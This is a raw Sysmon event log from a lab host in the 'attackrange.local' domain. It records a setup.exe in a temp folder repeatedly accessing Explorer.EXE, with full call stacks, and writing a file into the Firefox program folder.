13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\plugin-container.exe2021-01-18 13:59:52.505 10341000x800000000000000015286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows